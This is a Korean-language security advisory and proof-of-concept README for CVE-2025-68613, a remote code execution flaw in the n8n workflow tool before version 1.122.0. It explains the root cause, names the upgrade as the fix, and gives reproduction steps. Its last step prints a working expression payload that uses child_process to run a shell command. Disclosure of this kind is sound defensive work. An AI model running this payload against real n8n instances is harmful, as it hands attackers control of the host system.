
CVE-2025-68613에 대한 개념 증명 익스플로잇, n8n 워크플로 자동화의 치명적인 RCE입니다. 1.122.0 이전 버전에서 표현식 평가기 우회를 통한 임의 명령 실행을 시연합니다.
보안 권고: n8n의 치명적인 원격 코드 실행 취약점 (CVE-2025-68613)
n8n 워크플로우 자동화 도구에서 임의 코드 실행을 허용하는 치명적인 취약점이 발견되었습니다. 워크플로우를 생성하거나 편집할 권한이 있는 인증된 사용자는 이 결함을 악용하여 n8n 인스턴스가 실행 중인 시스템을 제어할 수 있습니다. 요약
CVE ID CVE-2025-68613 취약점 동적으로 관리되는 코드 리소스에 대한 부적절한 제어 심각도 치명적 영향 임의 명령 실행, 시스템 완전 장악 근본 원인 표현식 평가기가 기본 Node.js 프로세스 객체(this.process)에 대한 접근을 적절히 차단하지 못하여, 공격자가 child_process와 같은 시스템 모듈을 require하여 사용할 수 있음 영향
이 취약점을 성공적으로 악용한 공격자는 다음을 달성할 수 있습니다:
취약/패치 버전 상태 버전 취약 1.122.0 미만 모든 버전 패치 1.122.0 이상 완화 조치
이 취약점을 해결하려면 n8n 인스턴스를 즉시 1.122.0 이상으로 업그레이드하는 것이 중요합니다.
CVE-2025-68613 익스플로잇 상세 정보
이 디렉토리에는 n8n의 원격 코드 실행 취약점(CVE-2025-68613)에 대한 개념 증명이 포함되어 있습니다. 요구 사항
재현 단계
워크플로우 생성:
노드 추가:
설정 노드 구성:
result로 설정합니다.익스플로잇 페이로드 주입:
익스플로잇:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
실행 및 확인:
id 명령의 출력이 표시되어 코드 실행이 확인됩니다.2025-12-23 15:18:56 스크린샷
